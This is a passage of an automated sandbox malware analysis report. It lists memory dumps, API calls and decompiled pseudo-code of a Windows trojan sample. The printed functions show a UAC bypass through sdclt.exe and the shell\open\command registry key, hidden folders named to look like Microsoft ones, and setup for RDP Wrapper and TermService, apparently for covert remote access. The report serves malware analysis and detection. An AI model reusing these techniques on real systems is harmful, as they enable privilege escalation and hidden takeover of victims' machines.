                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: 7$g_32969$g_33076$g_33266$g_33291$g_33331$g_33450$g_33784[i]$g_33906$g_34033[i][j]$g_34059$g_34335.f0$g_34335.f1$g_34335.f2$g_34335.f3$g_34335.f4$g_34597$g_34732.f0$g_34732.f1$g_34732.f2$g_34732.f3$g_34732.f4$g_34741$g_34858.f0$g_34858.f1$g_34858.f2$g_34858.f3$g_34858.f4$g_35067[i][j][k][l]$g_35113$g_35507$g_35613$g_35689$g_35997$g_36187$g_36207[i][j][k][l]$g_36312$g_36345$g_36361$g_36436$g_36525$g_36532[i][j]$g_36590[i]$g_36642$g_36953$g_37038$g_37257[i][j][k]$g_37445[i][j]$g_37452$g_37527$g_37537$g_37541$g_37560$g_37723$g_37892[i][j][k][l]$g_37946[i]$g_38136$g_38176$g_38237$g_38283$g_38304$g_38365$g_38536$g_38649[i][j]$g_38652$g_38688$g_38701$g_38723$g_38756$g_38758$g_38769[i]$g_38773$g_38775$g_38781$g_38782[i]$g_38790[i][j]$g_38794$g_38920$g_38925$g_39006$g_39046$g_39047$g_39180$g_39383$g_39385[i][j][k]$g_39448[i]$index = [%d]$index = [%d]$index = [%d]$index = [%d]$index = [%d]$index = [%d]$index = [%d][%d]$index = [%d][%d]$index = [%d][%d]$index = [%d][%d]$index = [%d][%d]$index = [%d][%d][%d]$index = [%d][%d][%d]$index = [%d][%d][%d][%d]$index = [%d][%d][%d][%d]$index = [%d][%d][%d][%d]
                                      • API String ID: 3472027048-4294153300
                                      • Opcode ID: 0539e477651dd54e425a078ce3c53cfe7aee5c1134a877c541790b5cc548f3bb
                                      • Instruction ID: aaf6a01618722533c769df44f806352c48c59e956152b74a3e482d8d97fbd059
                                      • Opcode Fuzzy Hash: 0539e477651dd54e425a078ce3c53cfe7aee5c1134a877c541790b5cc548f3bb
                                      • Instruction Fuzzy Hash: 93A28CB6E10205FFEB09EB98D856DBFB7B9EB85708F5085ACF51157341D270AA00CBA1
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 002606D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 138comCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1028 2606d5-26070f CoInitialize CoCreateInstance 1029 260715-260721 1028->1029 1030 26082c-260830 1028->1030 1031 260725-26072a 1029->1031 1031->1030 1032 260730-260738 1031->1032 1034 2607e8-260800 1032->1034 1036 260806-26080b 1034->1036 1037 26073d-260756 1034->1037 1038 260816-26081b 1036->1038 1039 26080d-260813 1036->1039 1037->1036 1043 26075c-26077b VariantInit 1037->1043 1040 260826 CoUninitialize 1038->1040 1041 26081d-260823 1038->1041 1039->1038 1040->1030 1041->1040 1047 260794-26079e call 255adb 1043->1047 1048 26077d-260792 1043->1048 1052 2607a0-2607a9 call 26098d 1047->1052 1053 2607ab 1047->1053 1048->1036 1048->1047 1054 2607ad-2607b6 1052->1054 1053->1054 1057 2607d6-2607e6 call 25239f 1054->1057 1058 2607b8 1054->1058 1057->1034 1059 2607ba-2607d4 1058->1059 1059->1057 1059->1059
                                      C-Code - Quality: 59%
                                      			E002606D5(intOrPtr __ecx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed short* _v36;
				char _v44;
				signed int* _t43;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr* _t50;
				intOrPtr* _t54;
				signed int _t57;
				char _t60;
				signed int _t61;
				intOrPtr* _t63;
				signed int _t64;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t71;
				void* _t73;
				signed int _t76;
				signed int _t85;
				signed int _t87;
				signed short* _t88;

				_t87 = 0;
				_v28 = __ecx;
				__imp__CoInitialize(0); // executed
				_t43 =  &_v12;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				__imp__CoCreateInstance(0x2625a0, 0, 1, 0x264834, _t43); // executed
				_t66 = _v12;
				if(_t66 != 0) {
					_t43 =  *((intOrPtr*)( *_t66 + 0xc))(_t66, 0x262590,  &_v8, 0);
					_t67 = _v8;
					if(_t67 != 0) {
						 *((intOrPtr*)( *_t67 + 0x14))(_t67);
						_t64 = 0;
						while(1) {
							_t47 = _v8;
							_v20 = _t87;
							_t48 =  *((intOrPtr*)( *_t47 + 0xc))(_t47, 1,  &_v24,  &_v20);
							if(_t48 != 0) {
								break;
							}
							_t50 = _v24 + _t64 * 4;
							_t48 =  *((intOrPtr*)( *_t50 + 0x24))(_t50, _t87, _t87, 0x262520,  &_v16);
							if(_t48 != 0) {
								break;
							}
							__imp__#8( &_v44);
							_t54 = _v16;
							_push(_t87);
							_push( &_v44);
							_push(L"Description");
							_push(_t54);
							if( *((intOrPtr*)( *_t54 + 0xc))() == 0) {
								L6:
								_t73 = 0x1c;
								if(E00255ADB(_t73) == 0) {
									_t85 = _t87;
								} else {
									_t85 = E0026098D(_t56);
								}
								_t88 = _v36;
								_t57 =  *_t88 & 0x0000ffff;
								if(_t57 == 0) {
									L12:
									 *(_t85 + 8) = _t64;
									E0025239F(_v28 + 4, _t85);
									_t64 = _t64 + 1;
									_t87 = 0;
									continue;
								} else {
									_t76 = _t57;
									do {
										 *( *((intOrPtr*)(_t85 + 4)) + _t87 * 2) = _t76;
										_t60 =  *_t88;
										_t88 =  &(_t88[1]);
										 *((char*)(_t87 +  *_t85)) = _t60;
										_t87 = _t87 + 1;
										_t61 =  *_t88 & 0x0000ffff;
										_t76 = _t61;
									} while (_t61 != 0);
									goto L12;
								}
							}
							_t63 = _v16;
							_t48 =  *((intOrPtr*)( *_t63 + 0xc))(_t63, L"FriendlyName",  &_v44, _t87);
							if(_t48 != 0) {
								break;
							}
							goto L6;
						}
						_t70 = _v8;
						if(_t70 != 0) {
							_t48 =  *((intOrPtr*)( *_t70 + 8))(_t70);
							_v8 = _t87;
						}
						_t71 = _v12;
						if(_t71 != 0) {
							_t48 =  *((intOrPtr*)( *_t71 + 8))(_t71);
							_v12 = _t87;
						}
						__imp__CoUninitialize();
						return _t48;
					}
				}
				return _t43;
			}






























                                      0x002606de
                                      0x002606e0
                                      0x002606e4
                                      0x002606ea
                                      0x002606ed
                                      0x002606fe
                                      0x00260701
                                      0x00260704
                                      0x0026070a
                                      0x0026070f
                                      0x00260722
                                      0x00260725
                                      0x0026072a
                                      0x00260733
                                      0x00260736
                                      0x002607e8
                                      0x002607e8
                                      0x002607f2
                                      0x002607fb
                                      0x00260800
                                      0x00000000
                                      0x00000000
                                      0x0026074a
                                      0x00260751
                                      0x00260756
                                      0x00000000
                                      0x00000000
                                      0x00260760
                                      0x00260766
                                      0x0026076c
                                      0x0026076d
                                      0x0026076e
                                      0x00260775
                                      0x0026077b
                                      0x00260794
                                      0x00260796
                                      0x0026079e
                                      0x002607ab
                                      0x002607a0
                                      0x002607a7
                                      0x002607a7
                                      0x002607ad
                                      0x002607b0
                                      0x002607b6
                                      0x002607d6
                                      0x002607da
                                      0x002607e0
                                      0x002607e5
                                      0x002607e6
                                      0x00000000
                                      0x002607b8
                                      0x002607b8
                                      0x002607ba
                                      0x002607bd
                                      0x002607c3
                                      0x002607c5
                                      0x002607c8
                                      0x002607cb
                                      0x002607cc
                                      0x002607cf
                                      0x002607d1
                                      0x00000000
                                      0x002607ba
                                      0x002607b6
                                      0x0026077d
                                      0x0026078d
                                      0x00260792
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00260792
                                      0x00260806
                                      0x0026080b
                                      0x00260810
                                      0x00260813
                                      0x00260813
                                      0x00260816
                                      0x0026081b
                                      0x00260820
                                      0x00260823
                                      0x00260823
                                      0x00260826
                                      0x00000000
                                      0x00260826
                                      0x0026072a
                                      0x00260830

                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 002606E4
                                      • CoCreateInstance.OLE32(002625A0,00000000,00000001,00264834,?), ref: 00260704
                                      • VariantInit.OLEAUT32(?), ref: 00260760
                                      • CoUninitialize.OLE32 ref: 00260826
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInitInitializeInstanceUninitializeVariant
                                      • String ID: Description$FriendlyName
                                      • API String ID: 4142528535-3192352273
                                      • Opcode ID: f04f12ed62bfbaffa642a0860d573b2ab77a3475f3bc5853f00acf538243a98d
                                      • Instruction ID: d7130611d0fbf3b13006f340101912afd20be3b13ba1398f5556966233b3f73b
                                      • Opcode Fuzzy Hash: f04f12ed62bfbaffa642a0860d573b2ab77a3475f3bc5853f00acf538243a98d
                                      • Instruction Fuzzy Hash: AA415F74A10206EFDB14DFA5C888DAFFBB9EF89700B14849DE442EB250D770E991DB60
                                      Uniqueness

                                      Uniqueness Score: 6.84%

                                      Function 012E19AA, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000019B6), ref: 012E19AF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 22f4709e361b8ea66f3918c4621f91acfc924eadc87c2ccd8aa8094e6cff1e56
                                      • Instruction ID: 88ac46b202dd5b3fbf6ef6d711162c25a26c538f2444d2edd661042c87b0b20c
                                      • Opcode Fuzzy Hash: 22f4709e361b8ea66f3918c4621f91acfc924eadc87c2ccd8aa8094e6cff1e56
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: 0.01%

                                      Function 002611D0, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 137registrystringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      C-Code - Quality: 93%
                                      			E002611D0(void* __edx, void* __edi, void* __eflags) {
				char _v584;
				char _v600;
				char _v1112;
				short _v1132;
				intOrPtr _v1212;
				char _v1216;
				char _v1228;
				char _v1232;
				char _v1248;
				intOrPtr _v1264;
				intOrPtr _v1272;
				intOrPtr _v1280;
				intOrPtr _v1296;
				intOrPtr _v1304;
				char _v1308;
				char _v1312;
				int _v1320;
				char _v1328;
				void* _v1332;
				char _v1336;
				char _v1340;
				char _v1344;
				char _v1348;
				intOrPtr _v1360;
				void* __ebx;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t86;
				char* _t100;
				void* _t104;
				void* _t105;
				void* _t110;

				_t110 = __eflags;
				_t105 = __edi;
				_t104 = __edx;
				_v1328 = 0xa;
				_v1320 = 0;
				E00255779( &_v1308);
				E0025F43F( &_v1228);
				E00251085(GetTickCount());
				RegCreateKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", 0, 0, 0, 0xf003f, 0,  &_v1332,  &_v1320); // executed
				RegSetValueExA(_v1332, "MaxConnectionsPer1_0Server", 0, 4,  &_v1328, 4); // executed
				RegSetValueExA(_v1332, "MaxConnectionsPerServer", 0, 4,  &_v1328, 4); // executed
				RegCloseKey(_v1332); // executed
				E002555A0( &_v1308, _t104, _t110); // executed
				E0025F2AD( &_v1228, _t104, _t110,  &_v1308); // executed
				_t94 =  &_v584;
				E00254B0F( &_v584, _t104, _t110,  &_v1312,  &_v1232); // executed
				E00251052( &_v1112, 0, 0x208);
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v1112, _t86); // executed
				lstrcatW( &_v1132, L"\\Microsoft Vision\\");
				CreateDirectoryW( &_v1132, 0); // executed
				if(_v1280 != 0) {
					_t82 = E0025DB97(); // executed
					if(_t82 != 1) {
						_t83 = E0025D4B8();
						_t113 = _t83 - 0xa;
						if(_t83 != 0xa) {
							E0025F843(0,  &_v584, __eflags);
						} else {
							E0025F8C0(_t104, _t113);
						}
					}
				}
				if(_v1264 != 0) {
					_t80 = E0025DB97();
					_t115 = _t80 - 1;
					if(_t80 == 1) {
						E00260D9D(_t94, _t115);
					}
				}
				_t116 = _v1212;
				if(_v1212 != 0) {
					L11:
					__eflags = _v1272;
					if(__eflags != 0) {
						E0025FCD9();
					}
					E00254A83( &_v600, _t104, __eflags);
					goto L14;
				} else {
					E0025F0C8( &_v1248, _t116, _v1304, _v1296); // executed
					_t117 = _v1312;
					if(_v1312 == 0) {
						goto L11;
					} else {
						_v1336 = 0;
						_t100 =  &_v1344;
						E0025345A(_t100,  &_v1216); // executed
						_push(_t100);
						E0025EB77( &_v1336, _t117,  &_v1348,  &_v1340); // executed
						E00255A2D(_v1360);
						E00255A2D(0);
						L14:
						E00254820( &_v600, _t105, _t117);
						E0025F069( &_v1248);
						E0025579E( &_v1328, _t105);
						return 0;
					}
				}
			}




































                                      0x002611d0
                                      0x002611d0
                                      0x002611d0
                                      0x002611df
                                      0x002611eb
                                      0x002611ef
                                      0x002611f8
                                      0x00261204
                                      0x00261227
                                      0x00261240
                                      0x00261259
                                      0x00261263
                                      0x0026126d
                                      0x0026127b
                                      0x0026128a
                                      0x00261291
                                      0x002612a4
                                      0x002612b9
                                      0x002612cc
                                      0x002612db
                                      0x002612e5
                                      0x002612e7
                                      0x002612ef
                                      0x002612f1
                                      0x002612f6
                                      0x002612f9
                                      0x00261302
                                      0x002612fb
                                      0x002612fb
                                      0x002612fb
                                      0x002612f9
                                      0x002612ef
                                      0x0026130b
                                      0x0026130d
                                      0x00261312
                                      0x00261315
                                      0x00261317
                                      0x00261317
                                      0x00261315
                                      0x0026131c
                                      0x00261323
                                      0x00261377
                                      0x00261377
                                      0x0026137b
                                      0x0026137d
                                      0x0026137d
                                      0x00261389
                                      0x00000000
                                      0x00261325
                                      0x00261331
                                      0x00261336
                                      0x0026133a
                                      0x00000000
                                      0x0026133c
                                      0x00261343
                                      0x00261348
                                      0x0026134c
                                      0x00261351
                                      0x00261360
                                      0x00261369
                                      0x00261370
                                      0x0026138e
                                      0x00261395
                                      0x0026139e
                                      0x002613a7
                                      0x002613b2
                                      0x002613b2
                                      0x0026133a

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 002611FD
                                      • RegCreateKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,0000000A,?), ref: 00261227
                                      • RegSetValueExA.KERNEL32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 00261240
                                      • RegSetValueExA.KERNEL32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 00261259
                                      • RegCloseKey.KERNEL32(?), ref: 00261263
                                        • Part of subcall function 002555A0: Sleep.KERNEL32(000001F4,?,?,00000000), ref: 002555B6
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002612B9
                                      • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 002612CC
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 002612DB
                                        • Part of subcall function 0025DB97: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0025DBA9
                                        • Part of subcall function 0025DB97: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0025DBB0
                                        • Part of subcall function 0025DB97: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0025DBCE
                                        • Part of subcall function 0025DB97: CloseHandle.KERNEL32(00000000), ref: 0025DBE3
                                        • Part of subcall function 0025D4B8: LoadLibraryA.KERNEL32(ntdll.dll), ref: 0025D4D0
                                        • Part of subcall function 0025D4B8: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0025D4E0
                                        • Part of subcall function 0025F8C0: GetCurrentProcess.KERNEL32(?,?,00000000), ref: 0025F8E2
                                        • Part of subcall function 0025F8C0: IsWow64Process.KERNEL32(00000000), ref: 0025F8E9
                                        • Part of subcall function 0025F8C0: GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 0025F920
                                        • Part of subcall function 0025F8C0: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0025F952
                                        • Part of subcall function 0025F8C0: lstrcatW.KERNEL32(?,\sdclt.exe), ref: 0025F964
                                        • Part of subcall function 0025F8C0: ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0025F97C
                                        • Part of subcall function 0025F8C0: ShellExecuteExW.SHELL32(?), ref: 0025F9AE
                                        • Part of subcall function 0025F8C0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0025F9B8
                                        • Part of subcall function 0025F8C0: Sleep.KERNEL32(000007D0), ref: 0025F9D0
                                        • Part of subcall function 0025F8C0: RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 0025F9E0
                                        • Part of subcall function 0025F8C0: ExitProcess.KERNEL32 ref: 0025F9E7
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 0026121D
                                      • \Microsoft Vision\, xrefs: 002612BF
                                      • MaxConnectionsPerServer, xrefs: 00261250
                                      • MaxConnectionsPer1_0Server, xrefs: 00261237
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CloseCreateCurrentDirectoryExecuteShellSleepTokenValuelstrcat$AddressCountDeleteExitFileFolderHandleInformationLibraryLoadModuleNameOpenPathProcSystemTerminateTickWow64
                                      • String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
                                      • API String ID: 2133878423-2552559493
                                      • Opcode ID: 6e6974344cc9fc1ee2938849e961e774229f6976ca96342c07cab4a49fd80ed4
                                      • Instruction ID: 51eeed4112bf46ba1e597879c6e58ac3fad0ece876a88db29158268ecd99f5d4
                                      • Opcode Fuzzy Hash: 6e6974344cc9fc1ee2938849e961e774229f6976ca96342c07cab4a49fd80ed4
                                      • Instruction Fuzzy Hash: CB413F71468345EBD720EF60DC85DAFB3ECAB54346F00092EBA96814A1DA70996CCF66
                                      Uniqueness

                                      Uniqueness Score: 6.84%

                                      Function 0025C987, Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 102UNIQUE
                                      Download Yara Rule

                                      Control-flow Graph

                                      C-Code - Quality: 79%
                                      			E0025C987(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t6;
				void* _t9;
				void* _t10;
				void* _t14;
				void* _t22;
				void* _t31;
				intOrPtr _t32;
				void* _t50;
				intOrPtr _t53;
				void* _t62;

				_t50 = __edx;
				_push(__ecx);
				InitializeCriticalSection(0x267cd8);
				_t53 = 5;
				asm("xorps xmm0, xmm0");
				 *0x267d24 = _t53;
				 *0x267d1c = _t53;
				_t31 = 0x18;
				asm("movups [0x267cf0], xmm0");
				 *0x267d00 = 0;
				asm("movups [0x267d08], xmm0");
				 *0x267d20 = 0;
				_t6 = E00255ADB(_t31);
				if(_t6 == 0) {
					_t32 = 0;
				} else {
					 *_t6 = _t53;
					_t1 = _t6 + 4; // 0x4
					_t32 = _t1;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
				}
				 *0x267d18 = _t32;
				 *0x267d30 = 0;
				 *0x267d34 = 0; // executed
				E0025312C(0x267d00, _t50, L"TermService"); // executed
				_t54 = L"%ProgramFiles%";
				E0025312C(0x267d0c, _t50, L"%ProgramFiles%"); // executed
				_t9 = E0025DBF3(0x267d0c); // executed
				_t65 = _t9 - 1;
				if(_t9 != 1) {
					_t51 = 0x267d0c;
					_t10 = E00253001( &_v8, 0x267d0c, __eflags); // executed
					_t62 = 0x267d10;
					E00253264(0x267d10, _t10); // executed
					E00255A2D(_v8);
				} else {
					E0025312C(0x267d0c, _t50, L"%ProgramW6432%");
					_t51 = 0x267d0c;
					_t22 = E00253001( &_v8, 0x267d0c, _t65);
					_t62 = 0x267d10;
					E00253264(0x267d10, _t22);
					E00255A2D(_v8);
					E0025312C(0x267d0c, 0x267d0c, _t54);
				}
				_t55 = L"\\Microsoft DN1";
				E00253297(_t62, _t51, _t65, L"\\Microsoft DN1"); // executed
				_t14 = E00253297(0x267d0c, _t51, _t65, _t55); // executed
				E0025D70F(_t14, _t62);
				E00253264(0x267d14, _t62); // executed
				E00253297(0x267d14, _t51, _t65, L"\\rdpwrap.ini"); // executed
				_t57 = L"\\sqlmap.dll";
				E00253297(_t62, _t51, _t65, L"\\sqlmap.dll"); // executed
				E00253297(0x267d0c, _t51, _t65, _t57); // executed
				return 0x267cd8;
			}














                                      0x0025c987
                                      0x0025c98a
                                      0x0025c993
                                      0x0025c99b
                                      0x0025c99c
                                      0x0025c99f
                                      0x0025c9a7
                                      0x0025c9af
                                      0x0025c9b0
                                      0x0025c9b7
                                      0x0025c9bd
                                      0x0025c9c4
                                      0x0025c9ca
                                      0x0025c9d1
                                      0x0025c9e3
                                      0x0025c9d3
                                      0x0025c9d3
                                      0x0025c9d5
                                      0x0025c9d5
                                      0x0025c9dc
                                      0x0025c9dd
                                      0x0025c9de
                                      0x0025c9df
                                      0x0025c9e0
                                      0x0025c9e0
                                      0x0025c9e5
                                      0x0025c9f5
                                      0x0025c9fb
                                      0x0025ca01
                                      0x0025ca06
                                      0x0025ca13
                                      0x0025ca18
                                      0x0025ca1d
                                      0x0025ca20
                                      0x0025ca57
                                      0x0025ca5c
                                      0x0025ca61
                                      0x0025ca69
                                      0x0025ca71
                                      0x0025ca22
                                      0x0025ca29
                                      0x0025ca2e
                                      0x0025ca33
                                      0x0025ca38
                                      0x0025ca40
                                      0x0025ca48
                                      0x0025ca50
                                      0x0025ca50
                                      0x0025ca76
                                      0x0025ca7e
                                      0x0025ca86
                                      0x0025ca8d
                                      0x0025ca9a
                                      0x0025caa6
                                      0x0025caab
                                      0x0025cab3
                                      0x0025cabb
                                      0x0025cac9

                                      APIs
                                      • InitializeCriticalSection.KERNEL32(00267CD8), ref: 0025C993
                                        • Part of subcall function 00255ADB: GetProcessHeap.KERNEL32(00000000,000000F4,0025E415,?,?,00000000,002555C4,?,?,00000000), ref: 00255ADE
                                        • Part of subcall function 00255ADB: HeapAlloc.KERNEL32(00000000,?,00000000,002555C4,?,?,00000000), ref: 00255AE5
                                        • Part of subcall function 00253001: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00253034
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
                                      • String ID: %ProgramFiles%$%ProgramW6432%$TermService$\Microsoft DN1$\rdpwrap.ini$\sqlmap.dll
                                      • API String ID: 2811233055-2974354589
                                      • Opcode ID: dc70ae845964672321850693c9f403d529b70671f54a561c08e52840a72f11ff
                                      • Instruction ID: aa9fe13e93a56eff48141824350584a0c29ee4264090ecb31860dd37fc15b694
                                      • Opcode Fuzzy Hash: dc70ae845964672321850693c9f403d529b70671f54a561c08e52840a72f11ff
                                      • Instruction Fuzzy Hash: 1331E921B34604578704FF29BC5683D66995FC9755720682EFC06D7292DFB08EA98B88
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 012E62F8, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1106 12e62f8-12e6304 1107 12e63aa-12e63ad 1106->1107 1108 12e6309-12e6319 1107->1108 1109 12e63b3 1107->1109 1110 12e631b-12e631e 1108->1110 1111 12e6326-12e633f LoadLibraryExW 1108->1111 1112 12e63b5-12e63bb 1109->1112 1113 12e63a7 1110->1113 1114 12e6324 1110->1114 1115 12e6391-12e639a 1111->1115 1116 12e6341-12e634a GetLastError 1111->1116 1113->1107 1118 12e63a3-12e63a5 1114->1118 1117 12e639c-12e639d FreeLibrary 1115->1117 1115->1118 1119 12e634c-12e635e call 12e5be1 1116->1119 1120 12e6381 1116->1120 1117->1118 1118->1113 1122 12e63bc-12e63be 1118->1122 1119->1120 1126 12e6360-12e6372 call 12e5be1 1119->1126 1121 12e6383-12e6385 1120->1121 1121->1115 1124 12e6387-12e638f 1121->1124 1122->1112 1124->1113 1126->1120 1129 12e6374-12e637f LoadLibraryExW 1126->1129 1129->1121
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
